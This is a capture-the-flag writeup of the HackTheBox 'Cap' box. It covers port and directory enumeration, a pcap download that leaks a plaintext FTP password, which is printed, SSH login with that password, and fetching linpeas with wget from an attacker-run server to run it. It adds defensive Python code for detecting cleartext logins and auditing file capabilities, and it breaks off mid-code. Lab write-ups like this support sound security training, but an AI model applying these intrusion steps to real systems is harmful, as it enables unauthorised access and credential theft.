RiotSecurityTeam
RiotSecurityTeam Blogs

Cap HackTheBox Writeup (Easy)

The box statistics are shown below.

image.png

Enumeration (NMAP)

Firstly, I ran an Nmap scan to identify open ports and to detect the services and versions running on them.

nmap -sC -sV 10.10.10.245
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-17 23:31 EDT
Nmap scan report for 10.10.10.245
Host is up (0.13s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    gunicorn
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Fri, 18 Jun 2021 03:43:59 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Fri, 18 Jun 2021 03:43:53 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386
|     <!DOCTYPE html>
|     <html class="no-js" lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Security Dashboard</title>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
|     <link rel="stylesheet" href="/static/css/bootstrap.min.css">
|     <link rel="stylesheet" href="/static/css/font-awesome.min.css">
|     <link rel="stylesheet" href="/static/css/themify-icons.css">
|     <link rel="stylesheet" href="/static/css/metisMenu.css">
|     <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
|     <link rel="stylesheet" href="/static/css/slicknav.min.css">
|     <!-- amchar
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Fri, 18 Jun 2021 03:43:53 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Allow: HEAD, GET, OPTIONS
|     Content-Length: 0
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 196
|     <html>
|     <head>
|     <title>Bad Request</title>
|     </head>
|     <body>
|     <h1><p>Bad Request</p></h1>
|     Invalid HTTP Version &#x27;Invalid HTTP Version: &#x27;RTSP/1.0&#x27;&#x27;
|     </body>
|_    </html>
|_http-server-header: gunicorn
|_http-title: Security Dashboard
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 137.03 seconds

Analysing the results above, we see three ports open and three services running:

  • 21/tcp = vsftpd 3.0.3
  • 22/tcp = OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
  • 80/tcp = http (gunicorn)

If you're unaware of what "gunicorn" is, here is a brief explanation: Gunicorn ("Green Unicorn") is a Python WSGI (Web Server Gateway Interface) HTTP server.

Web App Enumeration

Heading over to the web application, we see a nice template provided by "Colorlib".

image.png

Let's try discovering files and directories by running Gobuster. This can help us enumerate pages and functionality on the web app, or information that isn't supposed to be disclosed and can thus lead to vulnerabilities, e.g. a webpage that allows us to upload files but is still under construction.

gobuster dir -u http://10.10.10.245 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt                                                        
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.245
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/06/17 23:56:46 Starting gobuster in directory enumeration mode
===============================================================
/data                 (Status: 302) [Size: 208] [--> http://10.10.10.245/]
/ip                   (Status: 200) [Size: 17466]                         
/netstat              (Status: 200) [Size: 32292]                         
/capture              (Status: 302) [Size: 222] [--> http://10.10.10.245/data/16]

Analysing the responses, we have two "302" status codes ("Found", i.e. a redirection) and two "200" status codes ("OK"). Let's check these out, starting with the following URL: 10.10.10.245/ip

image.png

This page seems to be displaying the equivalent of "ipconfig" for Windows users and "ifconfig" for Linux users: it shows the box's eth0 interface configuration, e.g. the "inet" address. So somehow the app is posting information about the box, though whether it is live I am unsure. Let's check the source code for any kind of possible information disclosure or comments on this.

Viewing the source code, I see how it is displaying the "eth0" interface configuration:

<pre>eth0: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500
        inet 10.10.10.245  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 fe80::250:56ff:feb9:9a6f  prefixlen 64  scopeid 0x20&lt;link&gt;
        inet6 dead:beef::250:56ff:feb9:9a6f  prefixlen 64  scopeid 0x0&lt;global&gt;
        ether 00:50:56:b9:9a:6f  txqueuelen 1000  (Ethernet)
        RX packets 2907275  bytes 373001526 (373.0 MB)
        RX errors 0  dropped 290  overruns 0  frame 0
        TX packets 3095798  bytes 675868558 (675.8 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73&lt;UP,LOOPBACK,RUNNING&gt;  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10&lt;host&gt;
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 34789  bytes 2672084 (2.6 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 34789  bytes 2672084 (2.6 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0</pre>

Due to the look of this I do not believe an API is being loaded, as the output sits inside of pre tags, but this doesn't mean there isn't an API endpoint somewhere, so we can try checking the Network tab. But firstly, what are pre tags used for? Pre tags define a block of preformatted text that preserves line breaks, spaces etc.

Checking the Network tab is pretty simple: press "F12", navigate to "Network", and press "F5", which refreshes the page and lets us analyse everything being loaded onto that web page.

image.png

I do not see anything being loaded API-wise, so let's move on to the next thing, which is "/netstat". This sounds interesting, and I am wondering if it is live or has just been copied and pasted. We will follow the same mindset: analyse the page and the contents being loaded, then view the source code again.

Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       User       Inode      PID/Program name     Timer
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      101        32358      -                    off (0.00/0/0)
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      0          33655      -                    off (0.00/0/0)
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1001       35841      -                    off (0.00/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35224       TIME_WAIT   0          0          -                    timewait (37.23/0/0)
tcp        0    166 10.10.10.245:80         10.10.14.19:35811       ESTABLISHED 1001       437271     -                    on (0.62/0/0)
tcp        0    166 10.10.10.245:80         10.10.14.19:33113       ESTABLISHED 1001       436671     -                    on (0.56/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:57691       TIME_WAIT   0          0          -                    timewait (18.69/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.16:57266       ESTABLISHED 1001       436729     -                    off (0.00/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35264       TIME_WAIT   0          0          -                    timewait (55.26/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35192       TIME_WAIT   0          0          -                    timewait (32.73/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35172       TIME_WAIT   0          0          -                    timewait (4.11/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35186       TIME_WAIT   0          0          -                    timewait (33.14/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35216       TIME_WAIT   0          0          -                    timewait (34.35/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35244       TIME_WAIT   0          0          -                    timewait (40.74/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35212       TIME_WAIT   0          0          -                    timewait (36.98/0/0)
tcp        0    166 10.10.10.245:80         10.10.14.19:46493       ESTABLISHED 1001       437275     -                    on (0.54/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:40887       TIME_WAIT   0          0          -                    timewait (44.16/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35198       TIME_WAIT   0          0          -                    timewait (31.82/0/0)
tcp        0    166 10.10.10.245:80         10.10.14.19:35577       ESTABLISHED 1001       437274     -                    on (0.62/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35196       TIME_WAIT   0          0          -                    timewait (32.60/0/0)
tcp        0    166 10.10.10.245:80         10.10.14.19:47709       ESTABLISHED 1001       437273     -                    on (0.40/0/0)
tcp        0    166 10.10.10.245:80         10.10.14.19:51535       ESTABLISHED 1001       436688     -                    on (0.49/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:53699       TIME_WAIT   0          0          -                    timewait (43.73/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:32991       TIME_WAIT   0          0          -                    timewait (18.79/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35246       TIME_WAIT   0          0          -                    timewait (43.95/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:38617       TIME_WAIT   0          0          -                    timewait (40.03/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35242       TIME_WAIT   0          0          -                    timewait (42.42/0/0)
tcp        0      0 10.10.10.245:22         10.10.14.124:35156      ESTABLISHED 0          37911      -                    keepalive (1276.17/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35170       TIME_WAIT   0          0          -                    timewait (0.00/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35222       TIME_WAIT   0          0          -                    timewait (39.52/0/0)
tcp        0    166 10.10.10.245:80         10.10.14.19:44185       ESTABLISHED 1001       436670     -                    on (0.48/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35204       TIME_WAIT   0          0          -                    timewait (33.14/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35194       TIME_WAIT   0          0          -                    timewait (32.73/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35188       TIME_WAIT   0          0          -                    timewait (32.79/0/0)
tcp        0    166 10.10.10.245:80         10.10.14.19:41435       ESTABLISHED 1001       437272     -                    on (0.49/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35190       TIME_WAIT   0          0          -                    timewait (32.73/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35206       TIME_WAIT   0          0          -                    timewait (31.89/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35210       TIME_WAIT   0          0          -                    timewait (42.56/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35228       TIME_WAIT   0          0          -                    timewait (46.46/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35256       TIME_WAIT   0          0          -                    timewait (48.67/0/0)
tcp        0    166 10.10.10.245:80         10.10.14.19:50513       ESTABLISHED 1001       437294     -                    on (0.51/0/0)
tcp        0    166 10.10.10.245:80         10.10.14.19:46967       ESTABLISHED 1001       437296     -                    on (0.54/0/0)
tcp6       0      0 :::21                   :::*                    LISTEN      0          33290      -                    off (0.00/0/0)
tcp6       0      0 :::22                   :::*                    LISTEN      0          33657      -                    off (0.00/0/0)
udp        0      0 127.0.0.53:53           0.0.0.0:*                           101        31957      -                    off (0.00/0/0)
udp        0      0 10.10.10.245:60625      1.1.1.1:53              ESTABLISHED 101        433148     -                    off (0.00/0/0)
udp        0      0 127.0.0.1:37307         127.0.0.53:53           ESTABLISHED 102        437297     -                    off (0.00/0/0)
udp        0      0 10.10.10.245:55763      1.1.1.1:53              ESTABLISHED 101        433147     -                    off (0.00/0/0)
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node   PID/Program name     Path
unix  2      [ ACC ]     SEQPACKET  LISTENING     25965    -                    /run/udev/control
unix  2      [ ]         DGRAM                    38090    1192/systemd         /run/user/1001/systemd/notify
unix  2      [ ACC ]     STREAM     LISTENING     38093    1192/systemd         /run/user/1001/systemd/private
unix  2      [ ACC ]     STREAM     LISTENING     38099    1192/systemd         /run/user/1001/bus
unix  2      [ ACC ]     STREAM     LISTENING     38100    1192/systemd         /run/user/1001/gnupg/S.dirmngr
unix  2      [ ACC ]     STREAM     LISTENING     38101    1192/systemd         /run/user/1001/gnupg/S.gpg-agent.browser
unix  2      [ ACC ]     STREAM     LISTENING     38102    1192/systemd         /run/user/1001/gnupg/S.gpg-agent.extra
unix  2      [ ACC ]     STREAM     LISTENING     25949    -                    @/org/kernel/linux/storage/multipathd
unix  2      [ ACC ]     STREAM     LISTENING     38103    1192/systemd         /run/user/1001/gnupg/S.gpg-agent.ssh
unix  3      [ ]         DGRAM                    25933    -                    /run/systemd/notify
unix  2      [ ACC ]     STREAM     LISTENING     38104    1192/systemd         /run/user/1001/gnupg/S.gpg-agent
unix  2      [ ACC ]     STREAM     LISTENING     38105    1192/systemd         /run/user/1001/pk-debconf-socket
unix  2      [ ACC ]     STREAM     LISTENING     38106    1192/systemd         /run/user/1001/snapd-session-agent.socket
unix  2      [ ACC ]     STREAM     LISTENING     25936    -                    /run/systemd/private
unix  2      [ ACC ]     STREAM     LISTENING     25938    -                    /run/systemd/userdb/io.systemd.DynamicUser
unix  2      [ ACC ]     STREAM     LISTENING     25947    -                    /run/lvm/lvmpolld.socket
unix  2      [ ]         DGRAM                    25950    -                    /run/systemd/journal/syslog
unix  10     [ ]         DGRAM                    25958    -                    /run/systemd/journal/dev-log
unix  2      [ ACC ]     STREAM     LISTENING     25960    -                    /run/systemd/journal/stdout
unix  9      [ ]         DGRAM                    25962    -                    /run/systemd/journal/socket
unix  2      [ ACC ]     STREAM     LISTENING     34700    -                    /run/irqbalance//irqbalance821.sock
unix  2      [ ACC ]     STREAM     LISTENING     26920    -                    /run/systemd/journal/io.systemd.journal
unix  2      [ ACC ]     STREAM     LISTENING     31209    -                    /run/dbus/system_bus_socket
unix  2      [ ACC ]     STREAM     LISTENING     31220    -                    /run/snapd.socket
unix  2      [ ACC ]     STREAM     LISTENING     31222    -                    /run/snapd-snap.socket
unix  2      [ ACC ]     STREAM     LISTENING     31224    -                    /run/uuidd/request
unix  2      [ ACC ]     STREAM     LISTENING     31881    -                    /var/run/vmware/guestServicePipe
unix  2      [ ACC ]     STREAM     LISTENING     31214    -                    /var/snap/lxd/common/lxd/unix.socket
unix  2      [ ACC ]     STREAM     LISTENING     31213    -                    @ISCSIADM_ABSTRACT_NAMESPACE
unix  2      [ ]         DGRAM                    33081    -                    
unix  2      [ ]         DGRAM                    26922    -                    
unix  3      [ ]         STREAM     CONNECTED     34873    -                    
unix  3      [ ]         STREAM     CONNECTED     29694    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     31731    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     71252    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     71305    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     34686    65345/sh             
unix  3      [ ]         STREAM     CONNECTED     32581    -                    
unix  3      [ ]         STREAM     CONNECTED     32894    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     32727    -                    
unix  3      [ ]         STREAM     CONNECTED     34878    -                    /run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     38094    1192/systemd         
unix  3      [ ]         STREAM     CONNECTED     39198    -                    
unix  3      [ ]         STREAM     CONNECTED     57408    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     57429    4486/dbus-daemon     /run/user/1001/bus
unix  3      [ ]         STREAM     CONNECTED     30433    -                    
unix  3      [ ]         STREAM     CONNECTED     29693    -                    /run/systemd/journal/stdout
unix  2      [ ]         DGRAM                    38082    1192/systemd         
unix  2      [ ]         DGRAM                    27681    -                    
unix  3      [ ]         STREAM     CONNECTED     57407    4486/dbus-daemon     
unix  3      [ ]         STREAM     CONNECTED     29551    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     30640    -                    
unix  2      [ ]         DGRAM                    38075    -                    
unix  3      [ ]         STREAM     CONNECTED     30699    -                    
unix  3      [ ]         STREAM     CONNECTED     71251    22397/dirmngr        
unix  3      [ ]         STREAM     CONNECTED     57324    1192/systemd         
unix  3      [ ]         STREAM     CONNECTED     57426    4486/dbus-daemon     
unix  2      [ ]         DGRAM                    34872    -                    
unix  3      [ ]         STREAM     CONNECTED     30434    -                    
unix  3      [ ]         STREAM     CONNECTED     57427    4486/dbus-daemon     
unix  3      [ ]         STREAM     CONNECTED     34259    -                    
unix  3      [ ]         STREAM     CONNECTED     29550    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     71304    -                    
unix  3      [ ]         STREAM     CONNECTED     39199    -                    
unix  3      [ ]         DGRAM                    25934    -                    
unix  3      [ ]         DGRAM                    38092    1192/systemd         
unix  3      [ ]         STREAM     CONNECTED     26564    -                    
unix  2      [ ]         DGRAM                    57419    4486/dbus-daemon     
unix  3      [ ]         DGRAM                    38091    1192/systemd         
unix  3      [ ]         STREAM     CONNECTED     32505    -                    
unix  3      [ ]         STREAM     CONNECTED     31956    -                    
unix  3      [ ]         STREAM     CONNECTED     37159    -                    /run/dbus/system_bus_socket
unix  3      [ ]         DGRAM                    25935    -                    
unix  2      [ ]         DGRAM                    31877    -                    
unix  2      [ ]         DGRAM                    31749    -                    
unix  2      [ ]         DGRAM                    34980    -                    
unix  3      [ ]         STREAM     CONNECTED     34874    -                    
unix  3      [ ]         STREAM     CONNECTED     33326    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     33747    -                    /run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     33067    -                    
unix  2      [ ]         DGRAM                    27112    -                    
unix  3      [ ]         STREAM     CONNECTED     33773    -                    
unix  3      [ ]         STREAM     CONNECTED     38064    1192/systemd         
unix  2      [ ]         STREAM     CONNECTED     36982    -                    
unix  3      [ ]         STREAM     CONNECTED     33333    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     27176    -                    /run/systemd/journal/stdout
unix  2      [ ]         DGRAM                    35192    -                    
unix  3      [ ]         STREAM     CONNECTED     34879    -                    /run/dbus/system_bus_socket
unix  2      [ ]         DGRAM                    36316    -                    
unix  2      [ ]         DGRAM                    47888    -                    
unix  3      [ ]         STREAM     CONNECTED     31212    -                    
unix  3      [ ]         STREAM     CONNECTED     33332    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     33445    -                    
unix  2      [ ]         DGRAM                    37042    -                    
unix  3      [ ]         STREAM     CONNECTED     31240    -                    
unix  3      [ ]         STREAM     CONNECTED     31309    -                    /run/systemd/journal/stdout
unix  3      [ ]         DGRAM                    71550    -                    
unix  3      [ ]         DGRAM                    26594    -                    
unix  3      [ ]         STREAM     CONNECTED     31382    -                    /run/systemd/journal/stdout
unix  3      [ ]         DGRAM                    31200    -                    
unix  3      [ ]         STREAM     CONNECTED     72068    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     31876    -                    
unix  3      [ ]         STREAM     CONNECTED     32979    -                    /run/systemd/journal/stdout
unix  3      [ ]         DGRAM                    27115    -                    
unix  3      [ ]         STREAM     CONNECTED     33754    -                    /run/dbus/system_bus_socket
unix  3      [ ]         DGRAM                    31201    -                    
unix  3      [ ]         STREAM     CONNECTED     34969    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     37143    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     34875    -                    /run/dbus/system_bus_socket
unix  2      [ ]         DGRAM                    31195    -                    
unix  3      [ ]         STREAM     CONNECTED     32890    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     71648    -                    
unix  3      [ ]         DGRAM                    31199    -                    
unix  3      [ ]         STREAM     CONNECTED     32972    -                    
unix  3      [ ]         STREAM     CONNECTED     34876    -                    /run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     27177    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     34877    -                    /run/dbus/system_bus_socket
unix  3      [ ]         DGRAM                    31198    -                    
unix  3      [ ]         DGRAM                    26595    -                    
unix  3      [ ]         STREAM     CONNECTED     29868    -                    
unix  3      [ ]         DGRAM                    26596    -                    
unix  3      [ ]         STREAM     CONNECTED     31380    -                    
unix  3      [ ]         STREAM     CONNECTED     35157    -                    
unix  3      [ ]         STREAM     CONNECTED     33777    -                    
unix  3      [ ]         STREAM     CONNECTED     27103    -                    
unix  3      [ ]         DGRAM                    26593    -                    
unix  3      [ ]         DGRAM                    71551    -                    
unix  3      [ ]         STREAM     CONNECTED     35199    -                    
unix  2      [ ]         DGRAM                    26588    -                    
unix  3      [ ]         DGRAM                    27114    -                    
unix  3      [ ]         STREAM     CONNECTED     31308    -                    
unix  3      [ ]         STREAM     CONNECTED     29869    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     33776    -                    
unix  3      [ ]         STREAM     CONNECTED     33774    -                    /run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     33186    -

Once again it's inside of pre tags, so I can only assume it has been copied and pasted onto the web page, but this still gives an overview of what is running on the box (connections, ports, sockets etc.), and this information can help us map the machine.

Exploitation

Heading over to "/capture" we see the following in the URL "/data/10".

image.png

This shows a preview of packets. In my case there is "0" on everything, so there is no traffic. I am going to try loading /capture once again to analyse whether any traffic is being loaded. Interestingly, this time I see "/data/11". What if we change it to "/data/5"?

image.png

It displays packets, but in an exact form; this is weird and looks fake. Let's try viewing "1" or "0": "/data/0".

image.png

This shows a basic number of packets and their data types, e.g. "Number of Packets" "72" and so on. Let's download this "packet capture"; assuming it's a .pcap file, we can load it into Wireshark, which is a packet/traffic analyser.

Do the following to successfully load the .pcap file into Wireshark and analyse the traffic.

  1. Search for "wireshark" or download and install it.
  2. Click "File" and then select "Open".
  3. Navigate to the directory where the 0.pcap file is and click "Open".

If done correctly you'll see a lot of traffic. If this is your first time using Wireshark, do not panic: please watch a video on Wireshark traffic analysis and then come back, or if you're interested in a brief overview, stay here.

image.png

As we can see above there is a basic layout, e.g. "Time, Source, Destination, Protocol, Length, Information". Source is the IP address the packet was sent from, Destination is usually the receiver, and Protocol is what they're using to communicate, e.g. "TCP, HTTP". Now, we saw there was "vsftpd" on the machine, and the issue with FTP/vsftpd is that credentials are sent in plain text, so if we use the "filter" option of Wireshark and look for FTP we may be able to gain a bit of information.

image.png

As you can see there is FTP traffic, meaning there are most likely some credentials. Analysing the traffic we can see "Nathan", which is a possible username. I confirmed this by double clicking on the request and clicking through "FTP".

image.png

We then see FTP asking for a password, which got sent in plain text.

image.png

"Buck3tH4TF0RM3!" is the FTP password! 1+1 = Username: nathan, Password: Buck3tH4TF0RM3!. We can now log in with FTP.
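The leak above is exactly what a network monitor should flag. As an added example that is not part of the original writeup, here is a minimal Python parser for a pcap of Ethernet/IPv4/TCP frames that reports cleartext FTP logins (client IP and username) without copying the password into its own output; the capture it runs on is constructed inline (10.10.10.245 from the writeup as the server, 192.0.2.10 as a made-up client, and a placeholder password).

```python
import struct
# pcap global header: magic, version 2.4, tz 0, sigfigs 0, snaplen 65535, linktype 1 (Ethernet)
PCAP_GLOBAL = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)

def build_frame(src_ip, payload, sport=40000, dport=21):
    """Constructed Ethernet/IPv4/TCP frame carrying one FTP control line (checksums left 0)."""
    eth = b"\x00" * 12 + b"\x08\x00"
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload), 0, 0, 64, 6, 0,
                     bytes(map(int, src_ip.split("."))), bytes([10, 10, 10, 245]))
    frame = eth + ip + tcp + payload
    return struct.pack("<IIII", 0, 0, len(frame), len(frame)) + frame  # per-packet header + frame

def tcp_payloads(pcap):
    """Yield (src_ip, dst_port, payload) for every Ethernet/IPv4/TCP packet in the pcap."""
    off = 24
    while off + 16 <= len(pcap):
        caplen = struct.unpack_from("<I", pcap, off + 8)[0]
        pkt = pcap[off + 16:off + 16 + caplen]
        off += 16 + caplen
        if len(pkt) < 54 or pkt[12:14] != b"\x08\x00" or pkt[23] != 6:  # need IPv4 + TCP
            continue
        ihl = (pkt[14] & 0x0F) * 4
        src_ip = ".".join(str(b) for b in pkt[26:30])
        t = 14 + ihl                                  # start of the TCP header
        dport = struct.unpack_from("!H", pkt, t + 2)[0]
        yield src_ip, dport, pkt[t + (pkt[t + 12] >> 4) * 4:]

def find_cleartext_ftp_logins(pcap):
    """Return [(client_ip, username, password_seen)] for logins sent in the clear to port 21.
    The password value is deliberately not returned: an alert should not copy the secret."""
    logins, pending = [], {}
    for src_ip, dport, data in tcp_payloads(pcap):
        if dport != 21:
            continue
        verb, _, arg = data.decode("ascii", "replace").strip().partition(" ")
        if verb.upper() == "USER":
            pending[src_ip] = arg                     # remember who is logging in
        elif verb.upper() == "PASS" and src_ip in pending:
            logins.append((src_ip, pending.pop(src_ip), bool(arg)))
    return logins

# Constructed capture: an FTP login (username from the writeup, placeholder password) plus
# one unrelated HTTP request on port 80 that the detector must ignore.
SAMPLE_PCAP = PCAP_GLOBAL + b"".join([
    build_frame("192.0.2.10", b"USER nathan\r\n"),
    build_frame("192.0.2.10", b"PASS not-the-real-password\r\n"),
    build_frame("192.0.2.10", b"GET / HTTP/1.0\r\n\r\n", dport=80),
])
```

Calling find_cleartext_ftp_logins(SAMPLE_PCAP) returns [("192.0.2.10", "nathan", True)]; a real 0.pcap saved by Wireshark can be passed in as bytes the same way.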

image.png

We are now logged in, so we can start enumerating the box. The first thing I want to check is whether I can move between directories: "cd /home" gave me a directory-changed-successfully message, meaning we can.

image.png

We also had SSH open on the default SSH port, "22". Let's try authenticating with the same credentials.

image.png

Priv Esc

Now that we are on the box as "Nathan", we need to get root. I am going to run linpeas, a popular tool for identifying ways to priv esc and spotting things that are a potential risk; e.g. it checks binaries, cronjobs, permissions, etc.

Assuming you've got linpeas on your box, we will use the following commands to transfer it to Nathan's box using the simple web server built into python3.

python3 -m http.server

wget http://$IP:8000/linpeas.sh

Make sure you have "linpeas.sh" in your working directory, e.g. /opt/HTB/linpeas.sh, and start your web server from that directory (/opt/HTB).

image.png

Now we need to give linpeas executable permissions. Run the following command as the Nathan user so that linpeas can be executed.

chmod +x linpeas.sh

Now run linpeas using the following command, and please do not get overwhelmed if this is your first time viewing linpeas output.

./linpeas.sh

image.png

There is a lot of information; if you are unsure about 90% of it, please just do some research, e.g. "Checking for crontabs": if you are unaware of what a crontab is, Google it.

Also keep an eye on the colour of the output, as shown in the legend below.

linpeas v3.2.5 by carlospolop

ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.

Linux Privesc Checklist: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username

Going through the linpeas output we see "Files with capabilities (limited to 50):", and Python3 is listed under that category.

/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

image.png

The binary is owned by root. We should also note "cap_setuid": the Python os module has functions to get the user's UID, set the UID and a lot more, and I believe that because of "cap_setuid" we can change our UID.
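To find this class of issue before an attacker does, audit file capabilities the same way you audit SUID binaries. Added example, not from the writeup: a Python parser for the "path = caps+flags" lines that getcap printed above, flagging binaries whose permitted and effective sets include a capability that lets a caller change identity or bypass file permissions (the risky set is my own choice); it runs on the five lines from this page, reproduced inline.

```python
import re
from typing import NamedTuple

# Capabilities that let a caller change identity, bypass file permissions or escape
# confinement. This set is my own choice for the audit, not something linpeas defines.
RISKY_CAPS = {"cap_setuid", "cap_setgid", "cap_chown", "cap_dac_override",
              "cap_dac_read_search", "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module"}

class CapFinding(NamedTuple):
    path: str
    caps: frozenset   # capability names in this clause
    flags: str        # subset of "eip": effective, inheritable, permitted
    risky: frozenset  # caps that are also in RISKY_CAPS

CLAUSE_RE = re.compile(r"^([a-z0-9_,]+)\+([eip]{1,3})$")  # e.g. cap_setuid,cap_net_bind_service+eip

def parse_getcap_line(line):
    """Parse one 'path = caps+flags [caps+flags ...]' line as printed by getcap on this page.
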